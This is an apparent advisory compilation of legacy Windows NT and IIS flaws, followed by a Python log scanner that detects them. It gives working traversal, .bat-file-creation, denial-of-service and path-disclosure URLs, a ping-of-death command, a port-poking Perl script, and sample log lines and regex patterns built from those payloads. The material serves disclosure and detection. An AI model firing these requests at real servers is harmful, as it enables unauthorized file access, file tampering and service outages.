Affected systems: 4.0, IIS 1.01

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default the user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------
Affected systems: 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' already exists, it will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------
Affected systems: 3.51, 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple confused services can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more process time than usual. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script, gleaned from postings on the NTsecurity@iss.net list, to test the ports on your own system (Perl is available from the NT Resource Kit):
/*begin poke code*/

use Socket;
use FileHandle;
require "chat2.pl";   # Perl 4-era chat library (chat::open_port / chat::print / chat::close)

$systemname = shift @ARGV;   # host to test, given on the command line
die "usage: perl poke servername\n" unless defined $systemname;

$verbose = 1;      # tell me what you're hitting
$knownports = 1;   # don't hit known problem ports

for ($port = 1; $port < 65535; $port++)
{
    # skip the ports this posting describes as problematic
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    next unless $fh;   # nothing listening or connection refused
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}

/*end poke code*/
Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

Affected systems: 4.0
Using a telnet application to connect to a webserver via HTTP port 80 and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
--------------------------------------------------------------------------------
Affected systems: 3.51, 4.0

Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving them.

--------------------------------------------------------------------------------
Microsoft IIS 5.0 has problems handling a specific form of URL ending in "ida". There are two possible results. One is that the server responds with a message such as "URL String too long", "Cannot find the specified path" or the like. The other is that the server terminates with an "Access Violation" message, effectively a Denial of Service against the server. All IIS versions up to and including IIS 5.0 are vulnerable. When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida, the server will either crash (an effective DoS) or report its current directory location (revealing the directory structure).
--------------------------------------------------------
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found'. Such a response lets him learn more about how the web site is organized and the directory structure of the server.
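The request shapes described in this thread (the '..\..' traversal URLs, the '>PATH\target.bat' and '%0A%0D' redirection URLs in /scripts, the oversized '.ida' request and the '.ida'/'.idq' path-disclosure probes) all leave a recognisable trace in the web server log. The following is an added example, not code from the thread or from Microsoft, that scans W3C-style IIS log lines for those indicators. The log lines, the field layout (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) and the MAX_URI_LEN threshold are constructed assumptions; the checks run on the percent-decoded URI as well as the raw one, so it also goes beyond the thread's literal examples and catches encoded variants such as %2e%2e%5c.

```python
import re
from urllib.parse import unquote

# Longest request URI tolerated before flagging (assumed threshold; tune per site).
MAX_URI_LEN = 256

TRAVERSAL_RE = re.compile(r"\.\.[\\/]")        # "../" or "..\" once the URI is decoded
ENCODED_CRLF_RE = re.compile(r"%0[aAdD]")      # %0A / %0D left in the raw URI
IDA_IDQ_RE = re.compile(r"\.id[aq]$", re.IGNORECASE)


def classify_request(raw_uri):
    """Return the indicator names triggered by one request URI (empty list if clean).

    Checks run on both the raw and the percent-decoded form, so encoded
    variants (e.g. %2e%2e%5c) are caught alongside the literal ..\\ form.
    """
    tags = []
    decoded = unquote(raw_uri)
    if TRAVERSAL_RE.search(decoded):
        tags.append("dot-dot-traversal")
    if ENCODED_CRLF_RE.search(raw_uri) or "\r" in decoded or "\n" in decoded:
        tags.append("crlf-in-uri")
    if decoded.lower().startswith("/scripts") and ">" in decoded:
        tags.append("scripts-redirection")
    if IDA_IDQ_RE.search(decoded):
        tags.append("ida-idq-request")
    if len(raw_uri) > MAX_URI_LEN:
        tags.append("oversized-uri")
    return tags


def parse_log_line(line):
    """Split one W3C-style line into fields; None for blank, comment or short lines."""
    if not line.strip() or line.startswith("#"):
        return None
    fields = line.split()
    if len(fields) < 7:
        return None
    _date, _time, ip, method, stem, query, status = fields[:7]
    return {"ip": ip, "method": method, "stem": stem, "query": query, "status": status}


def scan_log(text):
    """Return (client ip, uri stem, tags) for every request that trips an indicator."""
    hits = []
    for line in text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        tags = classify_request(rec["stem"])
        if tags:
            hits.append((rec["ip"], rec["stem"], tags))
    return hits


# Constructed sample log (not from any real server), one request per line:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = "\n".join([
    "1998-03-02 10:15:01 192.0.2.10 GET /index.htm - 200",
    "1998-03-02 10:15:07 192.0.2.10 GET /..\\..\\docs\\readme.txt - 200",
    "1998-03-02 10:15:12 192.0.2.11 GET /scripts/exploit.bat>c:\\inetpub\\target.bat - 502",
    "1998-03-02 10:15:20 192.0.2.12 GET /scripts/script_name%0A%0D>c:\\target.bat - 502",
    "1998-03-02 10:15:31 192.0.2.13 GET /anything.idq - 404",
    "1998-03-02 10:15:40 192.0.2.14 GET /" + "." * 300 + ".ida - 500",
    "1998-03-02 10:15:45 192.0.2.15 GET /products/list.asp id=7 200",
])

if __name__ == "__main__":
    for ip, stem, tags in scan_log(SAMPLE_LOG):
        shown = stem if len(stem) <= 60 else stem[:57] + "..."
        print(f"{ip:15} {', '.join(tags):40} {shown}")
```

Run against a real log, the same five indicators are what to hunt for: a traversal hit with a 200 status means the content root was escaped, a /scripts request containing '>' means a file was written to the server, and a burst of '.ida'/'.idq' probes from one client is reconnaissance of the physical directory layout.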